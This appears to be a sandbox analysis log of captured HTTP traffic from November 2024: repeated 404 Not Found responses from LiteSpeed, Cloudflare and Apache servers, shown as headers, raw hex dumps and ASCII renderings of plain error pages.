                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Mon, 04 Nov 2024 09:11:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:11:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: *Cache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8a%2BgM6wUYdfYs8PNGbqae9ic%2F0cASnuO6vF%2FD4T7hbd0s52l6TOvmv3v3cqOV%2B69aR759IZn32lTcMypaSEQxhMCxp60hm9Vm5WC2CvoyQJsFzX1YaKFYpiAl5MzF1qFBktj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd37a3868222cd0-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=732&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6 0c b3 9b 41 97 Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^A
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:11:37 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: *Cache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUcaFe%2FdHGjO4EE5aQE8Q2cfNg3%2BfoN%2BitF4jHZz%2BcWKRtidLntiPEW4JpsscEmo3yb0%2Beil%2BUzppnNdGk46G3KLS%2F25D%2BJOREAB1ey38abzcC0XSRFXdRaaXkqqtQHobqXC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd37a48af0fe987-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1180&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=752&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 38 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 Data Ascii: 187lRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:11:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: *Cache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bA%2BQeFHZwtuMrBlHNa3ZN%2FfcDy5nkorib22UOKIb3feyeEbZslsV01SE%2B3Zti%2FtZcEFlLmAnpGgV63EkzNtFN3rP9iV5r2aHU4McusmCMQY2V0DbpL6ZbN%2BohMr2n6YtsZG0"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd37a5859fa4779-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1562&sent=6&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10834&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 37 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 6c 52 cb 6e db 30 10 bc e7 2b a6 ec 55 b2 2c 27 0e 0a 59 36 90 3e 82 f6 d0 a6 a8 93 43 8e b4 b8 92 08 53 5c 81 a4 1d ab 46 ff 3d 90 84 b8 a8 5d 5e c8 59 cc 2c 66 76 99 bf fb fc f0 e9 f1 f9 e7 17 d4 a1 31 ab ab 7c bc 00 20 af 49 aa f1 39 c0 86 82 44 51 4b e7 29 2c c5 d3 e3 7d fc 41 20 39 27 58 d9 d0 52 38 de 70 f0 02 05 db 40 36 2c 85 65 6d 15 1d 22 cb 25 1b c3 2f ff 2a 7d e8 0c ad 70 76 36 ac 3a 1c b1 91 c5 b6 72 bc b3 2a 2e d8 b0 cb f0 be 2c cb 05 de c0 6c 36 5b a0 64 1b 32 a4 b7 ed 21 49 27 73 c4 b2 6d 0d c5 be f3 81 9a 08 1f 8d b6 db ef b2 58 0f f8 9e 6d 88 20 d6 54 31 e1 e9 9b 88 f0 ab b7 cb 11 c4 57 32 7b 0a ba 90 f8 41 3b 12 11 ee 9c 96 26 82 97 d6 c7 9e 9c 2e 17 68 a4 ab b4 cd 30 5d e0 cf d5 b9 e7 49 9f 58 6a 4b 0e c7 13 f3 7a da 1e 7a dd 21 7e d1 2a d4 19 6e a7 43 e5 52 5e a7 38 9e 82 a9 e2 7a 7e 33 1f b3 c5 5e ff a6 Data Ascii: 17dlRn0+U,'Y6>CS\F=]^Y,fv1| I9DQK),}A 9'XR8p@6,em"%/*}pv6:r*.,l6[d2!I'smXm T1W2{A;&.h0]IXjKzz!~*nCR^8z~3^
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:11:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: *Access-Control-Allow-Headers: *Cache-Control: no-cache, privatecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vsqhK5HbgmiABFpHGXz9FepJoljrfOBzgYHqweAOGTdPN45yzrZEQn%2BlzdT4fVfqfLEVlResxX%2BDDOCgsB05jvPTRT%2FcIj9%2FAYMlUlDu1jp96hKWCd1XaZe38U%2FYtqYIkr7S"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dd37a68bce26c6e-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1628&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=464&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30 Data Ascii: 285<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:37 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:43 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:46 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 63 72 69 70 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 73 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 6f 2e 6a 70 2f 69 6d 61 67 65 73 2f 70 75 62 6c 69 63 2f 63 6f 6d 6d 6f 6e 2f 6c 6f 67 6f 2e 67 69 66 22 20 61 6c 74 3d 22 47 4d 4f 20 49 6e 74 65 72 6e 65 74 2c 20 49 6e 63 2e 22 3e 3c 2f 68 31 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 22 3e 0a 3c 68 31 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 64 65 74 61 69 6c 22 3e e6 8c 87 e5 ae 9a e3 81 95 e3 82 8c e3 81 9f e3 83 9a e3 83 bc e3 82 b8 ef bc 88 55 52 4c ef bc 89 e3 81 af e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 80 82 3c 2f 70 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 2f 62 72 3e 0a 3c 61 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6f 6e 61 6d 61 65 2d 73 65 72 76 65 72 2e 63 6f 6d 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e e3 81 8a e5 90 8d e5 89 8d 2e 63 6f 6d 20 e3 83 ac e3 83 b3 e3 82 bf e3 83 ab e3 82 b5 e3 83 bc e3 83 90 e3 83 bc e3 81 ae e3 83 88 e3 83 83 e3 83 97 e3 83 9a e3 83 bc e3 82 b8 e3 81 ab e6 88 bb e3 82 8b 3c 2f 61 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 69 64 3d 22 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:48 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/html
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Nov 2024 09:12:51 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 05:13:09 GMTAccept-Ranges: bytesContent-Length: 1260Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 74 79 6c 65 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 